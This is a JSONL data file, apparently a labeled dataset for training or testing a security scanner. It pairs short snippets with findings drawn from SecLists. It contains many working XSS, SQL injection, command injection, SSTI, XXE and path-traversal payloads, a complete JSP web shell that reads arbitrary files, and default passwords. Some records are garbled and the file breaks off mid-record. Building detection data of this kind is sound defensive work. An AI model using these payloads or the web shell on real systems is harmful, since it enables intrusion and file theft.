{"id": "seclists_00000", "source": "seclists", "source_license": "MIT", "text": "lose focus!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "lose focus!", "injection_type": "XSS"}}]} {"id": "seclists_00001", "source": "seclists", "source_license": "MIT", "text": "\n

test

", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test", "injection_type": "XSS"}}]} {"id": "seclists_00002", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\nSCRIPT]]>alert('XSS');/SCRIPT]]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "SCRIPT]]>alert('XSS');/SCRIPT]]>", "injection_type": "XXE"}}]} {"id": "seclists_00003", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=constant('Twig_Environment::EXTRA_VERSION') HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "constant('Twig_Environment::EXTRA_VERSION')", "injection_type": "SSTI"}}]} {"id": "seclists_00004", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00005", "source": "seclists", "source_license": "MIT", "text": "\n
test
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "
test
", "injection_type": "XSS"}}]} {"id": "seclists_00006", "source": "seclists", "source_license": "MIT", "text": "\n
drag me
drop here
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "
drag me
drop here
", "injection_type": "XSS"}}]} {"id": "seclists_00007", "source": "seclists", "source_license": "MIT", "text": "\n

The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required.

", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required.", "injection_type": "XSS"}}]} {"id": "seclists_00008", "source": "seclists", "source_license": "MIT", "text": "password: embalmer\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "embalmer"}}]} {"id": "seclists_00009", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or a=a';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or a=a", "injection_type": "SQL"}}]} {"id": "seclists_00010", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"%20echo%20FBOBLU$((92%2B42))$(echo%20FBOBLU)FBOBLU%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%20echo%20FBOBLU$((92%2B42))$(echo%20FBOBLU)FBOBLU%26", "injection_type": "cmd"}}]} {"id": "seclists_00011", "source": "seclists", "source_license": "MIT", "text": "filename=%3Becho%20YORHEJ$((41%2B36))$(echo%20YORHEJ)YORHEJ%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho%20YORHEJ$((41%2B36))$(echo%20YORHEJ)YORHEJ%7C", "injection_type": "cmd"}}]} {"id": "seclists_00012", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' (select top 1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' (select top 1", "injection_type": "SQL"}}]} {"id": "seclists_00013", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22%7C%20%5B%204%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%204%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_00014", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n]]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "]]>", "injection_type": "XXE"}}]} {"id": "seclists_00015", "source": "seclists", "source_license": "MIT", "text": "\n
test
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "
test
", "injection_type": "XSS"}}]} {"id": "seclists_00016", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or%201=1 --';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or%201=1 --", "injection_type": "SQL"}}]} {"id": "seclists_00017", "source": "seclists", "source_license": "MIT", "text": "password: wildcat\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "wildcat"}}]} {"id": "seclists_00018", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=having 1=1-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "having 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_00019", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Amptron,,Polrty,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Amptron,,Polrty,"}}]} {"id": "seclists_00020", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YBJQLF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00021", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/../../../../../../../../../../../etc/passwd%00.html HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/../../../../../../../../../../../etc/passwd%00.html", "injection_type": "cmd"}}]} {"id": "seclists_00022", "source": "seclists", "source_license": "MIT", "text": "test\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test", "injection_type": "XSS"}}]} {"id": "seclists_00023", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'admin' or 1=1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' or 1=1", "injection_type": "SQL"}}]} {"id": "seclists_00024", "source": "seclists", "source_license": "MIT", "text": "\n
test
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test", "injection_type": "XSS"}}]} {"id": "seclists_00025", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=immortal\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "immortal"}}]} {"id": "seclists_00026", "source": "seclists", "source_license": "MIT", "text": "\n
`-alert(1)\">'onload=\"`", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "VtigerVulnPlugin.php"}}]} {"id": "seclists_00028", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26echo%20JOADAU$((32%2B46))$(echo%20JOADAU)JOADAU%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26echo%20JOADAU$((32%2B46))$(echo%20JOADAU)JOADAU%22", "injection_type": "cmd"}}]} {"id": "seclists_00029", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=
test HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test", "injection_type": "XSS"}}]} {"id": "seclists_00042", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\n/bin/ls -al\\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\n/bin/ls -al\\n", "injection_type": "cmd"}}]} {"id": "seclists_00043", "source": "seclists", "source_license": "MIT", "text": "", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Protocol Resolution Bypass", "injection_type": "XSS"}}]} {"id": "seclists_00044", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf '%26echo$IFSSGWYGH$((17%2B18))$(echo$IFSSGWYGH)SGWYGH%2F%2F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%26echo$IFSSGWYGH$((17%2B18))$(echo$IFSSGWYGH)SGWYGH%2F%2F", "injection_type": "cmd"}}]} {"id": "seclists_00045", "source": "seclists", "source_license": "MIT", "text": "\n

Exploit Name: IMG Embedded commands 2

", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: IMG Embedded commands 2", "injection_type": "XSS"}}]} {"id": "seclists_00046", "source": "seclists", "source_license": "MIT", "text": "\n
test
\n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "test", "injection_type": "XSS"}}]} {"id": "seclists_00047", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=
HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "
", "injection_type": "XSS"}}]} {"id": "seclists_00048", "source": "seclists", "source_license": "MIT", "text": "@keyframes x{}
\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "
", "injection_type": "XSS"}}]} {"id": "seclists_00049", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin\" or 1=1# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" or 1=1#", "injection_type": "SQL"}}]} {"id": "seclists_00050", "source": "seclists", "source_license": "MIT", "text": "username=hi or 1=1 --\"&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "hi or 1=1 --\"", "injection_type": "SQL"}}]} {"id": "seclists_00051", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Lucent,maint,rwmaint,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lucent,maint,rwmaint,"}}]} {"id": "seclists_00052", "source": "seclists", "source_license": "MIT", "text": "username=26 %&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "26 %", "injection_type": "SQL"}}]} {"id": "seclists_00053", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_00054", "source": "seclists", "source_license": "MIT", "text": "\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "injection_type": "XSS"}}]} {"id": "seclists_00055", "source": "seclists", "source_license": "MIT", "text": "@keyframes x{}\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "", "injection_type": "XSS"}}]} {"id": "seclists_00056", "source": "seclists", "source_license": "MIT", "text": "<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n//\n// JSP_KIT\n//\n// list.jsp = Directory & File View\n//\n// by: Sierra\n// modified: 27/06/2003\n//\n%>\n<%\nif(request.getParameter(\"file\")==null) {\n\t%>\n\t\n\t
\n\t\n\t\n\t
\n\t<%\n\t}\n%>\n<% //read the file name.\ntry { \nFile f = new File(request.getParameter(\"file\"));\nif(f.isDirectory()) {\n\tint i;\n\tString fname = new String(\"Unknown\");\n\tString fcolor = new String(\"Black\");\n\t%>\n\t\n\t\n\t<%\n\tout.print(\"Path: \" + f.toString() + \"

\");\n\tFile flist[] = f.listFiles();\n\tfor(i=0; i\" + fname.toString() + \" \" + \"( Size: \" + flist[i].length() + \" bytes)
\\n\");\n\t\t}\n\t%>\n\t
\n\t<%\n\n\t} else {\n\tif(f.canRead() == true) {\n\t\tInputStream in = new FileInputStream(f);\n\t\tServletOutputStream outs = response.getOutputStream();\n\t\tint left = 0;\n\t\t\ttry {\n\t\t\twhile((left) >= 0 ) {\n\t\t\t\tleft = in.read(); \n\t\t\t\touts.write(left);\n\t\t\t\t}\n\t\t\t} catch(IOException ex) {ex.printStackTrace();}\n\t\touts.flush();\n\t\touts.close();\n\t\tin.close();\t\n\t\t} else {\n\t\tout.print(\"Can't Read file
\");\n\t\t}\n\t}\n} catch(Exception ex) {ex.printStackTrace();}\n%>", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "jsp", "filename": "list.jsp"}}]} {"id": "seclists_00057", "source": "seclists", "source_license": "MIT", "text": "", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed.", "injection_type": "XSS"}}]} {"id": "seclists_00058", "source": "seclists", "source_license": "MIT", "text": "password: admin1\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "admin1"}}]} {"id": "seclists_00059", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, evil tags, obfuscated, injection HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, injection", "injection_type": "XSS"}}]} {"id": "seclists_00060", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = or benchmark(10000000,MD5(1))#", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_00061", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or true--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or true--", "injection_type": "SQL"}}]} {"id": "seclists_00062", "source": "seclists", "source_license": "MIT", "text": ":target {color:red;}</plaintext>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color:red;}</style><plaintext id=x style=\"transition:color 1s\" ontransitionend=alert(1)></plaintext>", "injection_type": "XSS"}}]} {"id": "seclists_00063", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<area oncopy=\"alert(1)\" contenteditable>test</area>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<area oncopy=\"alert(1)\" contenteditable>test</area>", "injection_type": "XSS"}}]} {"id": "seclists_00064", "source": "seclists", "source_license": "MIT", "text": "username=\" or 0=0 --&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or 0=0 --", "injection_type": "SQL"}}]} {"id": "seclists_00065", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf `perl -e 'print \".%p\" x 80'`%n", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "`perl -e 'print \".%p\" x 80'`%n", "injection_type": "cmd"}}]} {"id": "seclists_00066", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20BYUJUS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00067", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"\\'-alert(1)//\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\'-alert(1)//", "injection_type": "XSS"}}]} {"id": "seclists_00068", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Dword Encoding HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Dword Encoding", "injection_type": "XSS"}}]} {"id": "seclists_00069", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<q onmouseleave=\"alert(1)\">test</q> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<q onmouseleave=\"alert(1)\">test</q>", "injection_type": "XSS"}}]} {"id": "seclists_00070", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 1=1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1", "injection_type": "SQL"}}]} {"id": "seclists_00071", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\"^\" HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"^\"", "injection_type": "SQL"}}]} {"id": "seclists_00072", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.", "injection_type": "XSS"}}]} {"id": "seclists_00073", "source": "seclists", "source_license": "MIT", "text": "username=admin\" or 1=1--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\" or 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_00074", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: ha.ckers.org</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_00075", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><svg onload=alert(1)></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg onload=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_00076", "source": "seclists", "source_license": "MIT", "text": "filename=%3cscript%3ealert(document.cookie);%3c%2fscript%3e", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3cscript%3ealert(document.cookie);%3c%2fscript%3e", "injection_type": "cmd"}}]} {"id": "seclists_00077", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit String: 0%0d%0a%00<script src=//h4k.in></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: 0%0d%0a%00<script src=//h4k.in>", "injection_type": "XSS"}}]} {"id": "seclists_00078", "source": "seclists", "source_license": "MIT", "text": "password: Osicom,Manager,Manager,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Osicom,Manager,Manager,"}}]} {"id": "seclists_00079", "source": "seclists", "source_license": "MIT", "text": "filename=&#x3C;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x3C;", "injection_type": "cmd"}}]} {"id": "seclists_00080", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: %26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26", "injection_type": "LDAP"}}]} {"id": "seclists_00081", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7C%20%5B%202%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%202%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00082", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ) or pg_sleep(__TIME__)--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ") or pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_00083", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ${proc_open(print(`echo%20WMSMFM%0aecho%20$((4%2B30))%0aecho%20WMSMFM%0aecho%20WMSMFM`)%3BWMSMFM", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${proc_open(print(`echo%20WMSMFM%0aecho%20$((4%2B30))%0aecho%20WMSMFM%0aecho%20WMSMFM`)%3BWMSMFM", "injection_type": "cmd"}}]} {"id": "seclists_00084", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello self._TemplateReference__context</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "self._TemplateReference__context", "injection_type": "SSTI"}}]} {"id": "seclists_00085", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>PHP</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "PHP", "injection_type": "XSS"}}]} {"id": "seclists_00086", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin' #", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' #", "injection_type": "SQL"}}]} {"id": "seclists_00087", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<source id=x tabindex=1 onactivate=alert(1)></source> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<source id=x tabindex=1 onactivate=alert(1)></source>", "injection_type": "XSS"}}]} {"id": "seclists_00088", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %oa ping -n 30 127.0.0.1 %0a", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%oa ping -n 30 127.0.0.1 %0a", "injection_type": "cmd"}}]} {"id": "seclists_00089", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin\") or \"1\"=\"1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\") or \"1\"=\"1", "injection_type": "SQL"}}]} {"id": "seclists_00090", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<rtc onmouseout=\"alert(1)\">test</rtc> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rtc onmouseout=\"alert(1)\">test</rtc>", "injection_type": "XSS"}}]} {"id": "seclists_00091", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:bubba123", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "bubba123"}}]} {"id": "seclists_00092", "source": "seclists", "source_license": "MIT", "text": "filename='||UTL_HTTP.REQUEST", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'||UTL_HTTP.REQUEST", "injection_type": "cmd"}}]} {"id": "seclists_00093", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=51505150\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "51505150"}}]} {"id": "seclists_00094", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Nortel,spcl,0,AUTH codes in LD 8", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Nortel,spcl,0,AUTH codes in LD 8"}}]} {"id": "seclists_00095", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=xmen\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "xmen"}}]} {"id": "seclists_00096", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=a);id HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a);id", "injection_type": "cmd"}}]} {"id": "seclists_00097", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:popo@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "popo"}}]} {"id": "seclists_00098", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)", 